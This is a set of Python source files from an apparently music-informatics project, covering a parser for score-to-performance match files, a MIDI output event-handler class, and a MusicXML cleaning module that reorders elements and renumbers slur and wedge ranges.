pattern = 'sustain\(\s*([^,]*)\s*,\s*([^,]*)\s*\)\.'
re_obj = re.compile(pattern)
class SoftPedalLine(MatchLine):
"""
Class representing a soft pedal line
"""
field_names = ['Time','Value']
pattern = 'soft\(\s*([^,]*)\s*,\s*([^,]*)\s*\)\.'
re_obj = re.compile(pattern)
class SnoteNoteLine(MatchLine):
"""
Class representing a "match" (containing snote and note)
"""
pattern = Snote.pattern+'-'+Note.pattern
re_obj = re.compile(pattern)
def __init__(self,m1,m2):
self.snote = Snote(m1)
self.note = Note(m2)
class SnoteDeletionLine(MatchLine):
"""
Class representing the deletion of an snote
"""
field_names = Snote.field_names
pattern = Snote.pattern+'-deletion\.' # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m1):
self.snote = Snote(m1)
class InsertionNoteLine(MatchLine):
# field_names = Note.field_names
field_names = []
pattern = 'insertion-'+Note.pattern # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m2):
self.note = Note(m2)
class HammerBounceNoteLine(MatchLine):
field_names = Note.field_names
pattern = 'hammer_bounce-'+Note.pattern # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m2):
self.note = Note(m2)
class OrnamentNoteLine(MatchLine):
field_names = Note.field_names
pattern = 'ornament\([^\)]*\)-'+Note.pattern # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m2):
self.note = Note(m2)
class TrillNoteLine(MatchLine):
field_names = Note.field_names
pattern = 'trill\([^\)]*\)-'+Note.pattern # unused for efficiency reasons
re_obj = re.compile(pattern)
def __init__(self, m2):
self.note = Note(m2)
class SnoteTrailingLine(MatchLine):
field_names = ['Anchor','NoteName','Modifier','Octave',
'Bar','Beat','Offset','Duration',
'OnsetInBeats','OffsetInBeats','ScoreAttributesList']
pattern = 'snote\((.+),\[(.+),(.+)\],(.+),(.+):(.+),(.+),(.+),(.+),(.+),\[(.*)\]\)'
re_obj = re.compile(pattern)
def __init__(self,m):
self.snote = Snote(m)
class SnoteOnlyLine(MatchLine):
field_names = ['Anchor','NoteName','Modifier','Octave',
'Bar','Beat','Offset','Duration',
'OnsetInBeats','OffsetInBeats','ScoreAttributesList']
pattern = 'snote\((.+),\[(.+),(.+)\],(.+),(.+):(.+),(.+),(.+),(.+),(.+),\[(.*)\]\)'
re_obj = re.compile(pattern)
def __init__(self, m):
self.snote = Snote(m)
class MatchFile(object):
"""
Class for representing MatchFiles. It is instantiated by giving
the filename of a Match file
"""
def __init__(self, filename):
"""
Read the contents of a Match file `filename`
:param filename: filename of a match file
"""
fileData = [l.decode('utf8').strip() for l in open(filename,'rb')]
self.name = filename
self.voiceIdxFile = []
# the lines of the file, represented as MatchLine objects
self.lines = np.array([self.parse_matchline(l) for l in fileData])
@cached_property
def _info(self):
"""
Return all InfoLine objects
"""
return [i for i in self.lines if isinstance(i,InfoLine)]
def info(self, attribute = None):
"""
Return the value of the InfoLine object corresponding to
attribute, or None if there is no such object
:param attribute: the name of the attribute to return the value for
"""
if attribute:
try:
idx = [i.Attribute for i in self._info].index(attribute)
return self._info[idx].Value
except:
return None
else:
return self._info
@cached_property
def sustain_lines(self):
"""
Return all sustain pedal lines
"""
return [i for i in self.lines if isinstance(i,SustainPedalLine)]
@cached_property
def soft_lines(self):
"""
Return all soft pedal lines
"""
return [i for i in self.lines if isinstance(i,SoftPedalLine)]
@cached_property
def note_pairs(self):
"""
Return all (snote, note) tuples
"""
return [(x.snote, x.note) for x in self.lines if isinstance(x, SnoteNoteLine)]
def lines_at_score_times(self, times):
"""
Return all lines with snotes that span any value t in the array `times`
:param times: array of floats
:returns: a list of MatchLine objects for each value t in `times`
"""
snoteLines = [l for l in self.lines if hasattr(l,'snote')]
onoffsets = np.array([(l.snote.OnsetInBeats,l.snote.OffsetInBeats) for l in snoteLines],
dtype=np.dtype([('onset',float),('offset',float)]))
lidx = np.argsort(onoffsets,order=('onset','offset'))
tidx = np.argsort(times)
i = 0
i_min = 0
result = []
for t in times[tidx]:
r = []
ii = []
i = i_min
while i < len(lidx) and not (onoffsets['onset'][lidx[i]] > t and onoffsets['offset'][lidx[i]] > t):
if (onoffsets['onset'][lidx[i]] <= t and onoffsets['offset'][lidx[i]] > t):
r.append(lidx[i])
ii.append(i)
i += 1
if len(ii) > 0:
i_min = ii[0]
result.append(r)
return [[snoteLines[x] for x in notes] for notes in result]
@cached_property
def first_onset(self):
"""
The earliest snote onset in the file
"""
self.snote_idx()
if len(self.snoteIdx) == 0:
return None
else:
return self.lines[self.snoteIdx[0]].snote.OnsetInBeats
@cached_property
def time_signatures(self):
"""
A list of tuples (t, (a, b)), indicating a time signature of a over b, starting at t
"""
tspat = re.compile('([0-9]+)/([0-9]*)')
m = [(int(x[0]),int(x[1])) for x in
tspat.findall(self.info('timeSignature'))]
timeSigs = []
if len(m) > 0:
timeSigs.append((self.first_onset, m[0]))
for l in self.time_sig_lines():
timeSigs.append((float(l.TimeInBeats),[(int(x[0]),int(x[1])) for x in tspat.findall(l.Value)][0]))
timeSigs = list(set(timeSigs))
timeSigs.sort(key=lambda x: x[0])
return timeSigs
def _time_sig_lines(self):
return [i for i in self.lines if
isinstance(i,MetaLine) and
hasattr(i,'Attribute') and
i.Attribute == 'timeSignature']
def time_sig_lines(self):
ml = self._time_sig_lines()
if len(ml) == 0:
ts = self.info('timeSignature')
ml = [self.parse_matchline('meta(timeSignature,{0},1,{1}).'.format(ts,self.first_onset))]
return ml
def snote_idx(self):
"""
Return the line numbers that have snotes
"""
if hasattr(self,'snoteIdx'):
return self.snoteIdx
else:
self.snoteIdx = [i for i,l in enumerate(self.lines)
if hasattr(l,'snote')]
return self.snoteIdx
def soprano_voice(self, return_indices = False):
"""
Return the snotes marked as soprano notes (excluding those
marked as grace notes)
:param return_indices: if True, return the line numbers of the
soprano notes, otherwise return the
corresponding MatchLines themselves
:returns: a list of line numbers, or MatchLine objects
"""
if return_indices:
return [i for i,l in enumerate(self.lines)
if hasattr(l,'snote') and
's' in l.snote.ScoreAttributesList and
not 'grace' in l.snote.ScoreAttributesList and
l.snote.Duration > 0.0]
else:
return [l for l in self.lines
if hasattr(l,'snote') and
's' in l.snote.ScoreAttributesList and
not 'grace' in l.snote.ScoreAttributesList
and l.snote.Duration > 0.0]
def highest_voice_without_indexfile(self, exclude_grace = True, return_indices = False):
"""
Return the highest snotes
:param exclude_grace: if True, leave out any grace notes (default: True)
:param return_indices: if True, return the line numbers of the soprano
notes, otherwise return the corresponding MatchLines
themselves (default: False)
:returns: a list of line numbers, or MatchLine objects
"""
sopr = self.soprano_voice(return_indices)
if len(sopr) > 0:
return(sopr)
def is_grace(note):
return 'grace' in note.ScoreAttributesList
def in_lower_staff(note):
return 'staff2' in note.ScoreAttributesList
idx = self.snote_idx()
features = []
for i,idx in enumerate(self.snoteIdx):
n = self.lines[idx].snote
if not (in_lower_staff(n)
or (exclude_grace and is_grace(n))
or n.Duration == 0.0):
features.append((n.OnsetInBeats,n.OffsetInBeats,n.MidiPitch[0],i))
features = np.array(features)
# sort according to pitch (highest first)
features = features[np.argsort(features[:,2])[::-1]]
# sort according to onset (smallest first)
features = features[np.argsort(features[:,0],kind='mergesort')]
voice = [features[0,:]]
for f in features:
# if onset is later_eq than last voice offset, add next note
if f[0] >= voice[-1][1]:
voice.append(f)
# indices into the list of snotes
indices = np.array(np.array(voice)[:,3], int)
if return_indices:
return np.array(self.snoteIdx)[indices]
else:
#return [m for i,m in enumerate(self.lines[self.snoteIdx]) if i in indices]
return [l for l in self.lines[self.snoteIdx][indices]]
def parse_matchline(self,l):
"""
Return objects representing the line as one of:
* hammer_bounce-PlayedNote.
* info(Attribute, Value).
* insertion-PlayedNote.
* ornament(Anchor)-PlayedNote.
* ScoreNote-deletion.
* ScoreNote-PlayedNote.
* ScoreNote-trailing_score_note.
* trailing_played_note-PlayedNote.
* trill(Anchor)-PlayedNote.
* meta(Attribute,Value,Bar,Beat).
or False if none can be matched
"""
snoteMatch = Snote.match_pattern(l)
noteMatch = Note.match_pattern(l,pos = snoteMatch.end() if snoteMatch else 0)
if snoteMatch:
if noteMatch:
return SnoteNoteLine(snoteMatch,noteMatch)
else:
if re.compile('-deletion\.$').search(l,pos=snoteMatch.end()):
return SnoteDeletionLine(snoteMatch)
else:
if re.compile('-trailing_score_note\.$').search(l,pos=snoteMatch.end()):
return SnoteTrailingLine(snoteMatch)
else:
return SnoteOnlyLine(snoteMatch)
else: # no snoteMatch
if noteMatch:
if re.compile('^insertion-').search(l,endpos=noteMatch.start()):
return InsertionNoteLine(noteMatch)
elif re.compile('^trill\([^\)]*\)-').search(l,endpos=noteMatch.start()):
return TrillNoteLine(noteMatch)
elif re.compile('^ornament\([^\)]*\)-').search(l,endpos=noteMatch.start()):
return OrnamentNoteLine(noteMatch)
elif re.compile('^trailing_played_note-').search(l,endpos=noteMatch.start()):
return TrailingNoteLine(noteMatch)
elif re.compile('^hammer_bounce-').search(l,endpos=noteMatch.start()):
return HammerBounceNoteLine(noteMatch)
else:
return False
else:
metaMatch = MetaLine.match_pattern(l)
if metaMatch:
return MetaLine(metaMatch,lambda x: x)
else:
infoMatch = InfoLine.match_pattern(l)
if infoMatch:
return InfoLine(infoMatch,
field_interpreter = interpret_field)
else:
sustainMatch = SustainPedalLine.match_pattern(l)
if sustainMatch:
return SustainPedalLine(sustainMatch, field_interpreter = interpret_field)
else:
softMatch = SoftPedalLine.match_pattern(l)
if softMatch:
return SoftPedalLine(softMatch, field_interpreter = interpret_field)
else:
#return UnknownMatchLine(l)
return False
if __name__ == '__main__':
pass
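# Minimal usage sketch (illustrative; 'performance.match' is a hypothetical file name):
# mf = MatchFile('performance.match')
# mf.info('timeSignature')  # value of the timeSignature info line, or None
# mf.note_pairs             # list of (Snote, Note) tuples for matched notes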
```
#### File: data_handling/midi_backend/MidiOutStream.py
```python
class MidiOutStream:
"""
MidiOutstream is Basically an eventhandler. It is the most central
class in the Midi library. You use it both for writing events to
an output stream, and as an event handler for an input stream.
This makes it extremely easy to take input from one stream and
send it to another. Ie. if you want to read a Midi file, do some
processing, and send it to a midiport.
All time values are in absolute values from the opening of a
stream. To calculate time values, please use the MidiTime and
MidiDeltaTime classes.
"""
def __init__(self):
# the time is rather global, so it needs to be stored
# here. Otherwise there would be no really simple way to
# calculate it. The alternative would be to have each event
# handler do it. That sucks even worse!
self._absolute_time = 0
self._relative_time = 0
self._current_track = 0
self._running_status = None
# time handling event handlers. They should be overwritten with care
def update_time(self, new_time=0, relative=1):
"""
Updates the time, if relative is true, new_time is relative,
else it's absolute.
"""
if relative:
self._relative_time = new_time
self._absolute_time += new_time
else:
self._relative_time = new_time - self._absolute_time
self._absolute_time = new_time
def reset_time(self):
"""
reset time to 0
"""
self._relative_time = 0
self._absolute_time = 0
def rel_time(self):
"Returns the relative time"
return self._relative_time
def abs_time(self):
"Returns the absolute time"
return self._absolute_time
# running status methods
def reset_run_stat(self):
"Invalidates the running status"
self._running_status = None
def set_run_stat(self, new_status):
"Set the new running status"
self._running_status = new_status
def get_run_stat(self):
"Set the new running status"
return self._running_status
# track handling event handlers
def set_current_track(self, new_track):
"Sets the current track number"
self._current_track = new_track
def get_current_track(self):
"Returns the current track number"
return self._current_track
#####################
## Midi events
def channel_message(self, message_type, channel, data):
"""The default event handler for channel messages"""
pass
def note_on(self, channel=0, note=0x40, velocity=0x40):
"""
channel: 0-15
note, velocity: 0-127
"""
pass
def note_off(self, channel=0, note=0x40, velocity=0x40):
"""
channel: 0-15
note, velocity: 0-127
"""
pass
def aftertouch(self, channel=0, note=0x40, velocity=0x40):
"""
channel: 0-15
note, velocity: 0-127
"""
pass
def continuous_controller(self, channel, controller, value):
"""
channel: 0-15
controller, value: 0-127
"""
pass
def patch_change(self, channel, patch):
"""
channel: 0-15
patch: 0-127
"""
pass
def channel_pressure(self, channel, pressure):
"""
channel: 0-15
pressure: 0-127
"""
pass
def pitch_bend(self, channel, value):
"""
channel: 0-15
value: 0-16383
"""
pass
#####################
## System Exclusive
def system_exclusive(self, data):
"""
data: list of values in range(128)
"""
pass
#####################
## Common events
def song_position_pointer(self, value):
"""
value: 0-16383
"""
pass
def song_select(self, songNumber):
"""
songNumber: 0-127
"""
pass
def tuning_request(self):
"""
No values passed
"""
pass
def midi_time_code(self, msg_type, values):
"""
msg_type: 0-7
values: 0-15
"""
pass
#########################
# header does not really belong here. But anyhoo!!!
def header(self, format=0, nTracks=1, division=96):
"""
Parameters
-----------
format : number, optional. Default: 0
the type of MIDI file, possible is: 0, 1, 2
nTracks : number, optional. Default: 1
the number of tracks
division : number, optional. Default: 96
the timing division
# format: type of midi file in [0, 1, 2]
# nTracks: number of tracks
# division: timing division
"""
pass
def eof(self):
"""
End of file. No more events to be processed.
"""
pass
#####################
## meta events
def meta_event(self, meta_type, data):
"""
Handles any undefined meta events
"""
pass
def start_of_track(self, n_track=0):
"""
n_track: number of track
"""
pass
def end_of_track(self):
"""
No values passed
"""
pass
def sequence_number(self, value):
"""
value: 0-16383
"""
pass
def text(self, text):
"""
Text event
text: string
"""
pass
def copyright(self, text):
"""
Copyright notice
text: string
"""
pass
def sequence_name(self, text):
"""
Sequence/track name
text: string
"""
pass
def instrument_name(self, text):
"""
text: string
"""
pass
def lyric(self, text):
"""
text: string
"""
pass
def marker(self, text):
"""
text: string
"""
pass
def cuepoint(self, text):
"""
text: string
"""
pass
def midi_ch_prefix(self, channel):
"""
channel: midi channel for subsequent data (deprecated in the spec)
"""
pass
def midi_port(self, value):
"""
value: Midi port (deprecated in the spec)
"""
pass
def tempo(self, value):
"""
Parameters
----------
value : number
the tempo in microseconds / quarternote.
Possible values: 0-2097151
Calculate value from BPM (quarter notes per minute):
value = int(60000000.0 / BPM)
"""
pass
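# For example (illustrative), 120 BPM corresponds to
# int(60000000 / 120) == 500000 microseconds per quarter note.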
def smtp_offset(self, hour, minute, second, frame, framePart):
"""
hour,
minute,
second: 3 bytes specifying the hour (0-23), minutes (0-59) and
seconds (0-59), respectively. The hour should be
encoded with the SMPTE format, just as it is in MIDI
Time Code.
frame: A byte specifying the number of frames per second (one
of : 24, 25, 29, 30).
framePart: A byte specifying the number of fractional frames,
in 100ths of a frame (even in SMPTE-based tracks
using a different frame subdivision, defined in the
MThd chunk).
"""
pass
def time_signature(self, nn, dd, cc, bb):
"""
nn: Numerator of the signature as notated on sheet music
dd: Denominator of the signature as notated on sheet music
The denominator is a negative power of 2: 2 = quarter
note, 3 = eighth, etc.
cc: The number of MIDI clocks in a metronome click
bb: The number of notated 32nd notes in a MIDI quarter note
(24 MIDI clocks)
"""
pass
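# For example (illustrative), a 6/8 time signature is encoded as nn=6, dd=3,
# because the denominator is stored as a power of two: 2**3 == 8.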
def key_signature(self, sf, mi):
"""
sf: is a byte specifying the number of flats (-ve) or sharps
(+ve) that identifies the key signature (-7 = 7 flats, -1
= 1 flat, 0 = key of C, 1 = 1 sharp, etc).
mi: is a byte specifying a major (0) or minor (1) key.
"""
pass
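# For example (illustrative), D major (two sharps) is sf=2, mi=0, while
# D minor (one flat) is sf=-1, mi=1.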
def sequencer_specific(self, data):
"""
data: The data as byte values
"""
pass
#####################
## realtime events
def timing_clock(self):
"""
No values passed
"""
pass
def song_start(self):
"""
No values passed
"""
pass
def song_stop(self):
"""
No values passed
"""
pass
def song_continue(self):
"""
No values passed
"""
pass
def active_sensing(self):
"""
No values passed
"""
pass
def system_reset(self):
"""
No values passed
"""
pass
if __name__ == '__main__':
midiOut = MidiOutStream()
midiOut.update_time(0, 0)
midiOut.note_on(0, 63, 127)
midiOut.note_off(0, 63, 127)
```
#### File: extra/data_handling/musicxmlcleaning.py
```python
import re
import numpy as np
from lxml import etree
from collections import Counter, defaultdict, OrderedDict
from operator import itemgetter
import logging
logging.basicConfig(level=logging.INFO)
LOGGER = logging.getLogger(__name__)
CHILD_ORDER = {'//pitch': ['step', 'alter', 'octave'],
'//score-partwise': ['work', 'movement-number', 'movement-title',
'identification', 'defaults', 'credit',
'part-list', 'part'],
'//work': ['work-number', 'work-title', 'opus'],
'//direction': ['direction-type', 'offset', 'footnote', 'level',
'voice', 'staff', 'sound'],
'//barline': ['bar-style', 'footnote', 'level', 'wavy-line',
'segno', 'coda', 'fermata', 'ending', 'repeat'],
'//identification': ['creator', 'rights', 'encoding', 'source',
'relation, miscellaneous'],
'//attributes': ['divisions', 'key', 'time', 'staves', 'part-symbol',
'instruments', 'clef', 'staff-details', 'transpose',
'directive', 'measure-style'],
# TODO: add note child order (tricky, because can be different,
# depending presence/absence of children)
}
# min max numbers allowed in number attribute of slurs, wedges, dashes, etc
MIN_RANGE = 1
MAX_RANGE = 6
class Colors(object):
"""Escape codes for color in logging
"""
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_elements_by_position(measures, target):
"""
Return a dictionary indexed by position (in `divisions`), where each
position key maps to the list of elements matching the xpath expression
`target` at that position within the given `measures`.
"""
pos = 0
result = defaultdict(list)
for m in measures:
for e in m:
result[pos].extend(e.xpath(target))
dur = 0
if len(e.xpath('./chord[1]')) == 0:
try:
dur = int(e.xpath('./duration[1]/text()')[0])
except IndexError:
pass
if e.tag == 'backup':
dur = -dur
pos += dur
for k, v in result.items():
if len(v) == 0:
del result[k]
return dict(result)
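# Usage sketch (editor's addition; the target expression is illustrative only):
# collect all slur elements of a document grouped by onset position in divisions.
#   measures = doc.xpath('.//measure')
#   slurs_by_pos = get_elements_by_position(measures, './/slur')
#   for pos, slurs in sorted(slurs_by_pos.items()):
#       print(pos, len(slurs))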
def fix_order(doc, xpath, order=None):
"""
Fix the order of children in elements returned by `doc`.xpath(`xpath`). The
order of the children is given by a dictionary order with element tags as
keys, and a sorting number as value. Elements whose tags are not in `order`
are placed at the end in the order of original occurrence.
"""
if order is None:
order = CHILD_ORDER.get(xpath, {})
if not isinstance(order, dict):
order = dict(zip(order, range(len(order))))
elements = doc.xpath(xpath)
for e in elements:
e[:] = sorted(e, key=lambda x: order.get(x.tag, len(order)))
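# Usage sketch (editor's addition): reorder the children of every <pitch>
# element according to CHILD_ORDER, so that a pitch written e.g. as
# (octave, step, alter) becomes (step, alter, octave).
#   fix_order(doc, '//pitch')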
def fix_direction(doc):
"""
Directions need a direction-type element. This function looks for directions
that have no direction-type and if they have a sound element, tries to infer
a direction-type from the attributes of the sound element. If no
direction-type can be inferred, an Exception is raised.
"""
directions = doc.xpath('//direction')
to_dt = {'dacapo': dict(type='words', text='da capo'),
'fine': dict(type='words', text='fine'),
'segno': dict(type='segno'),
'coda': dict(type='coda')
}
for d in directions:
childtags = [e.tag for e in d]
has_dt = 'direction-type' in childtags
try:
sound_idx = childtags.index('sound')
except ValueError:
continue
if not has_dt:
dts = set.intersection(set(to_dt.keys()),
set(d[sound_idx].attrib.keys()))
if len(dts) > 0:
for w in dts:
dt = etree.Element('direction-type')
e = etree.Element(to_dt[w]['type'])
if 'text' in to_dt[w]:
e.text = to_dt[w]['text']
dt.append(e)
d.append(dt)
else:
raise Exception("Do not know how to deal with direction without direction-type (children: {})"
.format(childtags))
# chtagset = set(childtags).difference(set(('offset', 'staff', 'sound'
# 'footnote', 'level', 'voice')))
# if len(chtagset)
# s = d[sound_idx]
# d.remove(s)
# p = d.getparent()
# p.insert(p.index(d), s)
# p.remove(d)
def get_position_info(e, return_dict=False):
"""
Build a string that provides position information for the element, only
intended for manual inspection.
"""
# TODO, don't assume e is inside a measure
m = [x for x in e.iterancestors() if x.tag == 'measure'][0]
note = [x for x in e.iterancestors() if x.tag == 'note']
if len(note) > 0:
noteinfo = ' (note id: {}; left/top: {:.0f} / {:.0f})'.format(
note[0].get('ID'),
float(note[0].xpath('coordinates/pixel/left')[0].text),
float(note[0].xpath('coordinates/pixel/top')[0].text))
else:
noteinfo = ''
if return_dict:
return dict(measure=m.get('number'), page=m.get('page'), system=m.get('system'))
else:
return ('measure number {}, page {}, system {}{}'
.format(m.get('number'), m.get('page'), m.get('system'),
noteinfo))
def try_compress_numbers_to_range(elements):
"""
Map the "number" attribute of any element in `elements` to the most compact
range possible (starting from 1). If the resulting numbers are within
[MIN_RANGE, MAX_RANGE], return True, otherwise, return False. If it is not
possible to obtain a mapping within [MIN_RANGE, MAX_RANGE], the number
attributes are not modified.
"""
numbers = set(int(e.get('number')) for e in elements)
if len(numbers) <= ((MAX_RANGE - MIN_RANGE) + 1):
actual_nrs = sorted(numbers)
ideal_nrs = range(MIN_RANGE, MIN_RANGE + len(numbers))
if np.any(np.array(actual_nrs) != np.array(ideal_nrs)):
nr_map = dict(zip(actual_nrs, ideal_nrs))
LOGGER.debug(u'compressing number range {}'
.format(', '.join(u'{} → {}'.format(k, v) for k, v in nr_map.items())))
for e in elements:
old_nr = int(e.get('number'))
new_nr = nr_map[old_nr]
e.set('number', str(new_nr))
all_within_range = True
else:
all_within_range = False
return all_within_range
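# Example (editor's addition): if the elements use the numbers {2, 5, 7}, they
# are remapped to {1, 2, 3}; since 3 <= MAX_RANGE the function returns True.
# With more than (MAX_RANGE - MIN_RANGE) + 1 distinct numbers no remapping is
# attempted and False is returned.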
def get_first_non_blacklisted(blacklist):
"""Return the first integer not in `blacklist`.
"""
i = 1
while i in blacklist:
i += 1
return i
def get_note_ancestor(e):
"""
Return the first ancestor of `e` with tag "note", or None if there is no such
ancestor.
"""
for a in e.iterancestors():
if a.tag == 'note':
return a
return None
# def get_pitch(n):
# """
# """
# pitch = n.xpath('pitch')[0]
# return '{} {} {}'.format(''.join(pitch.xpath('step/text()')),
# ''.join(pitch.xpath('alter/text()')),
# ''.join(pitch.xpath('octave/text()')))
def remove_redundant_ranges(ebp, pbe):
matches, false_starts, false_stops = match_start_stop_elements(ebp)
be_note_pairs = defaultdict(list)
# be_pos_pairs = defaultdict(list)
for e_start, e_end in matches.items():
n_start = get_note_ancestor(e_start)
n_end = get_note_ancestor(e_end)
# if n_start and n_end and get_pitch(n_start) == get_pitch(n_end):
# print('tie?')
# be_pos_pairs[(pbe[e_start], pbe[e_end])].append(e_start)
be_note_pairs[(n_start, n_end)].append(e_start)
if (None, None) in be_note_pairs:
del be_note_pairs[(None, None)]
for ee in be_note_pairs.values():
if len(ee) > 1:
LOGGER.debug('removing {} redundant items'.format(len(ee) -1))
for e_start in ee[1:]:
e_start.getparent().remove(e_start)
e_end = matches[e_start]
e_end.getparent().remove(e_end)
def fix_start_stop_numbers(doc, xpath):
"""
Change the "number" attributes of elements matching `xpath` to lie within
the interval [MIN_RANGE, MAX_RANGE]. As opposed to the function
`try_compress_numbers_to_range` this function keeps track of which numbered
ranges are active, and reuses numbers if there are no ongoing ranges with
that number. It does not use numbers occurring in erroneous ranges (ranges
for which there are unmatched start or stop elements).
"""
measures = doc.xpath('.//measure')
ebp = get_elements_by_position(measures, xpath)
pbe = dict((e, p) for p, ee in ebp.items() for e in ee)
LOGGER.debug('mismatches before corrections:')
check_mismatches(ebp)
# fn = '/tmp/{}_before.txt'.format(re.sub('\W', '', xpath))
# plot_ranges(ebp, fn)
remove_redundant_ranges(ebp, pbe)
# ebp = get_elements_by_position(measures, xpath)
# pbe = dict((e, p) for p, ee in ebp.items() for e in ee)
all_within_range = try_compress_numbers_to_range([e for ee in ebp.values()
for e in ee])
if all_within_range:
LOGGER.debug('{}all within range{}'.format(Colors.OKGREEN, Colors.ENDC))
return True
else:
LOGGER.debug('not all within range')
matches, false_starts, false_stops = match_start_stop_elements(ebp)
inv_matches = dict((v, k) for k, v in matches.items())
# print('false st/st', len(false_starts), len(false_stops))
blacklist = set([int(e.get('number', -1)) for e in
false_starts + false_stops
if MIN_RANGE <= int(e.get('number', -1)) <= MAX_RANGE])
LOGGER.debug('blacklist: {}'.format(blacklist))
active = defaultdict(set)
active_at_pos = {}
positions = np.array(sorted(ebp.keys()))
for p_np in positions:
p = int(p_np)
ee = sorted(ebp[p], key=lambda x: x.get('type'), reverse=True)
for e in ee:
n = int(e.get('number', -1))
t = e.get('type')
if t in ('start', 'crescendo', 'diminuendo'):
active[n].add(e)
elif t == 'stop':
try:
active[n].remove(inv_matches[e])
except KeyError:
pass
else:
raise Exception()
active_at_pos[p] = set(x for y in active.values() for x in y)
# for p in positions:
# active = active_at_pos[int(p)]
# if len(active) > 0:
# print('{}: {}'.format(int(p), [int(e.get('number')) for e in active]))
for b, e in matches.items():
n = int(b.get('number'))
if n in blacklist:
continue
start = pbe[b]
end = pbe[e]
span = positions[np.logical_and(positions >= start, positions < end)]
concurrent = set(int(x.get('number', -1)) for p in span
for x in active_at_pos[int(p)].difference(set((b,))))
blacklist_for_range = blacklist.union(concurrent)
new_n = get_first_non_blacklisted(blacklist_for_range)
if not MIN_RANGE <= new_n <= MAX_RANGE:
#LOGGER.warning('Cannot renumber start-stop into valid range',start, end, n, new_n, concurrent)
LOGGER.warning('Cannot renumber start-stop into valid range (orig. nr: {}; new nr: {}; co-occurring numbers: {})'.format(n, new_n, concurrent))
LOGGER.warning('Position: ' + get_position_info(b))
else:
if n != new_n:
LOGGER.debug(u'renumbering {} → {} (blacklisted: {})'.format(n, new_n, list(blacklist_for_range)))
# print(start, end, n, '->', new_n, blacklist_for_range)
b.set('number', str(new_n))
e.set('number', str(new_n))
LOGGER.debug('mismatches after corrections:')
ebp = get_elements_by_position(measures, xpath)
check_mismatches(ebp)
# plot_ranges is only defined in commented-out code below, so this call is disabled
# fn = '/tmp/{}_after.txt'.format(re.sub('\W', '', xpath))
# plot_ranges(ebp, fn)
def check_mismatches(ebp):
"""
Check if there are any mis-matched range start/stop elements. Only for
informational purposes.
"""
matches, false_starts, false_stops = match_start_stop_elements(ebp)
pbe = dict((e, p) for p, ee in ebp.items() for e in ee)
false_start_by_nr = Counter()
false_stop_by_nr = Counter()
for e in false_starts:
false_start_by_nr.update((int(e.get('number', -1)),))
for e in false_stops:
false_stop_by_nr.update((int(e.get('number', -1)),))
nrs = set.union(set(false_start_by_nr.keys()),
set(false_stop_by_nr.keys()))
for n in nrs:
LOGGER.debug(u'{}number {} has {} false starts and {} false stops{}'.format(
Colors.FAIL, n, false_start_by_nr[n],
false_stop_by_nr[n], Colors.ENDC).encode('utf8'))
# counter = defaultdict(lambda: defaultdict(lambda: 0))
# for p in sorted(ebp.keys()):
# # sort elements by reverse lexical order of attribute type, to ensure
# # that "stop" elements are handled before "start" elements (nevermind
# # "diminuendo", "crescendo")
# for e in sorted(ebp[p], key=lambda x: x.get('type'), reverse=True):
# n = int(e.get('number', -1))
# t = e.get('type')
# counter[n][t] += 1
# for k, ss in counter.items():
# # print(k,ss['start'], ss['stop'])
# # if ss['start'] != ss['stop']:
# nstart = sum(ss[t] for t in ('start', 'diminuendo', 'crescendo'))
# if not nstart == ss['stop']:
# level = Colors.FAIL
# else:
# level = Colors.OKGREEN
# print(u'{}number {} has {} starts and {} stops{}'.format(
# level, k, nstart, ss['stop'], Colors.ENDC).encode('utf8'))
# def plot_ss(ebp, outfile, false_starts=[], false_stops=[]):
# symb = dict(start='<', stop='>')
# with open(outfile, 'w') as f:
# for p in sorted(ebp.keys()):
# for e in ebp[p]:
# n = int(e.get('number', -1))
# t = e.get('type')
# s = symb[t]
# f.write('{} {} {}\n'.format(p, n, s))
# def plot_ranges(ebp, outfile):
# symb = dict(start='<',
# crescendo='<',
# diminuendo='<',
# stop='>',
# false_start='X',
# false_stop='Y'
# )
# matches, false_starts, false_stops = match_start_stop_elements(ebp)
# # print('false starts', len(false_starts))
# # print('false stops', len(false_stops))
# pbe = dict((e, p) for p, ee in ebp.items() for e in ee)
# data = []
# active = defaultdict(list)
# n_active = {}
# for p in sorted(ebp.keys()):
# for e in sorted(ebp[p], key=lambda x: x.get('type'), reverse=True):
# n = int(e.get('number', -1))
# t = e.get('type')
# if t in ('start', 'crescendo', 'diminuendo'):
# active[n].append(e)
# elif t == 'stop':
# try:
# active[n].pop()
# except:
# pass
# else:
# raise Exception()
# n_active[p] = sum(len(x) for x in active.values())
# for s, e in matches.items():
# data.append((pbe[s], int(s.get('number')), symb[s.get('type')], n_active[pbe[s]]))
# data.append((pbe[e], int(e.get('number')), symb[e.get('type')], n_active[pbe[e]]))
# for s in false_starts:
# # print(pbe[s], get_position_info(s))
# data.append((pbe[s], int(s.get('number')), symb['false_start'], n_active[pbe[s]]))
# for s in false_stops:
# data.append((pbe[s], int(s.get('number')), symb['false_stop'], n_active[pbe[s]]))
# data.sort(key=itemgetter(0))
# with open(outfile, 'w') as f:
# for row in data:
# f.write('{} {} {} {}\n'.format(*row))
def match_start_stop_elements(ebp):
"""
Return a list of matching start/stop elements, as well as a list of
non-matched start and non-matched stop elements, occurring in the values of
dictionary `ebp` (as returned by `get_elements_by_position`).
"""
matches = {}
started = defaultdict(list)
false_starts = []
false_stops = []
for p in sorted(ebp.keys()):
# sort elements by reverse lexical order of attribute type, to ensure
# that "stop" elements are handled before "start" elements (nevermind
# "diminuendo", "crescendo")
for e in sorted(ebp[p], key=lambda x: x.get('type'), reverse=True):
n = int(e.get('number', -1))
t = e.get('type')
if t in ('start', 'crescendo', 'diminuendo'):
if len(started[n]) > 0:
# print('false start')
false_starts.append(e)
else:
started[n].append(e)
elif t == 'stop':
if len(started[n]) == 0:
# print('false stop')
false_stops.append(e)
else:
es = started[n].pop()
matches[es] = e
else:
raise Exception('unexpected element type: {}'.format(t))
for ss in started.values():
false_starts.extend(ss)
return matches, false_starts, false_stops
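# Return value sketch (editor's addition): `matches` maps each start element to
# its corresponding stop element; `false_starts` collects start elements whose
# number was already open at that point, and `false_stops` collects stop
# elements for which no start with that number was open.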
```
#### File: extra/data_handling/scoreontology.py
```python
import sys
import string
import re
from copy import copy
import numpy as np
